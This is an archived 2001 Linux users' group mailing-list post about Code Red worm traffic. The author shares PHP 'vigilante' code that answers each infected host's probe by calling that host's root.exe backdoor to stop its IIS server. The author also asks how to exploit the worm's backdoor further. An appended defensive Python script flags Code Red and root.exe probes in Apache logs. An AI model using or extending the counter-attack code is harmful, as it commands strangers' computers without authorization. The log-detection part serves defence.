[NTLUG:Discuss] Code Red Concerns Revisited

Daniel Hauck xdesign at hotmail.com
Tue Sep 11 05:12:37 CDT 2001


Code Red hits continue to hit my web server in a fairly constant stream.
Obviously no new variants are running and so the latest version continues to
be the one.  As we all know, @Home users have fallen victim to the
mass-ignorance of its ubiquitous Microsoft users.  These "install all
options and let all defaults fly" users are blissfully unaware of their role
as the target of blame for a loss in quality of service for a great number
of @Home users.

*I* am an @Home user and I currently still have "normal" access to the
internet both incoming and outgoing.  I would like to protect my "internet"
by running a counter-attack.  I have been running a "default.ida" file that
is actually a PHP4 script (apparently) designed to shut down some services
but that does not shut down the Code Red process(es).

With this, I am soliciting for the most effective anti-code-red code I can
install onto a Linux/Apache/PHP4 server.  I am unashamed to host such code
as such a vigilante move is the only foreseeable means by which we can
protect our own interests.  I'm completely unhappy with the casual ignorance
of most MS users (ignorance by design) and the blanket method @Home was
forced into [permanently?] applying against its users.

The worst part is that @Home's move, while protecting many users against
infection, protects infected users from disinfection!  How is that for
irony?  So the infected and protected users remain free to transmit their
flags of stupidity free from the backlash of hackers and vigilante code.

Here is my vigilante code:

---
default.ida:
<?
        $command  = "lynx -source http://";
        $command .= $REMOTE_ADDR;
        $command .= "/scripts/root.exe?/c+iisreset+/stop";

        $retvalu  = exec($command);
?>
---

Simple, yet [hopefully] effective.  I know that there are methods at PHP's
disposal to perform the same function(s) for which "lynx" is being used.
But simplicity was part of the goal in this case.  However, for reasons stated
above, I don't believe I'm making the most of the situation here.

I know that "Code Red" is an old issue, but it's actually very much alive
and as far as I'm concerned, a valid and active one.

Now, I know that in addition to the port 80 vulnerability, the newest breed
of Code Red also opens a backdoor of some type.  My question is if this
backdoor can be exploited in spite of the blocked port 80?  And if so, how?
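
As an added example (not part of this post or the author's code), here is a defender's-side Python script that flags Code Red and root.exe probes in Apache access logs so the infected source addresses can be identified and reported to their ISP. The log lines are constructed, and the signature names are my own.

```python
import re
from collections import Counter

# Request signatures these worms leave in a web server's access log.
# Code Red's .ida query is padded with a long run of N's (Code Red II used X's)
# ahead of the overflow payload; /scripts/root.exe is the backdoor named in the post.
SIGNATURES = [
    ("codered-ida-overflow", re.compile(r"^GET /default\.ida\?[NX]{50,}", re.I)),
    ("root-exe-backdoor",    re.compile(r"^GET /scripts/root\.exe\?/c\+", re.I)),
]

# Apache common/combined log prefix: client IP, ident, user, [timestamp] "request" status
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')

def classify(line):
    """Return (client_ip, signature_name) if the line is a worm probe, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    for name, pattern in SIGNATURES:
        if pattern.search(m.group("req")):
            return m.group("ip"), name
    return None

def scan(lines):
    """Count probes per (client_ip, signature); the IPs are the infected hosts to report."""
    hits = Counter()
    for line in lines:
        result = classify(line)
        if result:
            hits[result] += 1
    return hits

def infected_hosts(lines):
    """Sorted list of client IPs that sent at least one probe."""
    return sorted({ip for ip, _ in scan(lines)})

# Constructed sample lines (not from a real server); the first mimics Code Red's 224 N's.
SAMPLE_LOG = [
    '24.0.0.17 - - [11/Sep/2001:04:58:02 -0500] "GET /default.ida?' + "N" * 224
    + '%u9090%u6858%ucbd3 HTTP/1.0" 404 276 "-" "-"',
    '24.0.0.17 - - [11/Sep/2001:04:58:03 -0500] "GET /default.ida?' + "X" * 224
    + '%u9090%u6858%ucbd3 HTTP/1.0" 404 276 "-" "-"',
    '10.1.2.3 - - [11/Sep/2001:05:01:10 -0500] "GET /index.html HTTP/1.1" 200 1043 "-" "Lynx/2.8.4"',
    '24.0.0.99 - - [11/Sep/2001:05:02:44 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"',
]

if __name__ == "__main__":
    for (ip, sig), n in sorted(scan(SAMPLE_LOG).items()):
        print(f"{ip:<16} {sig:<22} {n}")
```

Feed it the real access_log instead of SAMPLE_LOG to get the list of @Home addresses still hammering the server; on Apache these requests show up as 404s, so status codes alone won't tell you anything.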